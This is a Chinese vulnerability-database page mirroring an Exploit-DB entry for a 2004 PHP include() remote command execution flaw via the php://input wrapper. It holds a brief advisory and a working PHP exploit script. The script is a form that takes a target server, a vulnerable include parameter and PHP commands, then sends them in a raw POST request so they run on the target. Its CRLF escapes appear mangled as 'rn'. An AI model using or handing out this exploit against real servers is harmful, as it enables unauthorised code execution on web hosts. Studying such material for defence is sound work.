PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution

PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution

漏洞ID 1054479 漏洞类型
发布时间 2004-05-27 更新时间 2004-05-27
图片[1]-PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution-安全小百科CVE编号 N/A
图片[2]-PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24149
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10427/info

PHP is reportedly affected by an arbitrary command-execution weakness through the PHP 'include()' function. This issue is due to a design error that allows the execution of attacker-supplied POST PHP commands when URI data is used as an argument to an 'include()' function.

This issue affect the PHP module itself; however, the problem presents itself only when an application uses a user-supplied URI parameter as an argument to the 'include()' function.

This issue is reported to affect all versions of PHP since 3.0.13. Furthermore, this issue is not resolved by setting the 'php.ini' variable 'allow_url_fopen' to off.

Successful exploitation of this issue will allow an attacker to execute arbitrary PHP code on the affected computer; this will allow the execution of commands to the underlying operating system with the privileges of the affected webserver process. 

<form action="" methode="post" >
target server : <input type="text" name="server" ><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") : <input type="text" name="file" ><br><br>
exec (enclose php commands between <? .. ?> tags): <input type="text" name="cmd" ><br><br>
<INPUT type="submit" value="send">
</form>

<?
if($cmd){
$message  = "POST /".$file."php://input HTTP/1.1rn";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn";
$message .= "Accept-Language: frrn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "Accept-Encoding: deflatern";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)rn";
$message .= "Host: ".$server."rn";
$message .= "Content-length: ".strlen( $cmd )."rn";
$message .= "Connection: Keep-Alivern";
$message .= "Cache-Control: no-cachern";
$message .= "rn";
$message .= $cmd."rn";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>

相关推荐: eL DAPo Authentication Information Disclosure Weakness

eL DAPo Authentication Information Disclosure Weakness 漏洞ID 1100977 漏洞类型 Design Error 发布时间 2003-01-30 更新时间 2003-01-30 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享